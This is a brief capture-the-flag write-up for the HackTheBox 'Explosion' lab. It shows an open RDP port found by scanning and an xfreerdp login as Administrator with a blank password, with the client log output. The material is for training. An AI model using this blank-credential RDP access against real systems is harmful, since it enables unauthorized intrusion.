#####################
# Sources and Links #
#####################

#########
# TL,DR #
#########
Nmap shows port 3389 open.
xfreerdp allows a session to be created.
Brute-force: username is Administrator, password is blank.
Grants access to flag.

########
# Hack #
########
┌──(ryan㉿kali)-[~/HackTheBox/Explosion]
└─$ xfreerdp /u:Administrator /v:10.129.134.134
[08:22:22:170] [11537:11538] [INFO][com.freerdp.core] - freerdp_connect:freerdp_set_last_error_ex resetting error state
[08:22:22:170] [11537:11538] [INFO][com.freerdp.client.common.cmdline] - loading channelEx rdpdr
[08:22:22:170] [11537:11538] [INFO][com.freerdp.client.common.cmdline] - loading channelEx rdpsnd
[08:22:22:171] [11537:11538] [INFO][com.freerdp.client.common.cmdline] - loading channelEx cliprdr
[08:22:22:489] [11537:11538] [INFO][com.freerdp.primitives] - primitives autodetect, using optimized
[08:22:22:500] [11537:11538] [INFO][com.freerdp.core] - freerdp_tcp_is_hostname_resolvable:freerdp_set_last_error_ex resetting error state
[08:22:22:500] [11537:11538] [INFO][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex resetting error state
[08:22:23:716] [11537:11538] [WARN][com.freerdp.crypto] - Certificate verification failure 'self signed certificate (18)' at stack position 0
[08:22:23:717] [11537:11538] [WARN][com.freerdp.crypto] - CN = Explosion
Password:  <Enter>

Grants access to Administrator's desktop with a flag.

###########
# Learned #
###########
xfreerdp
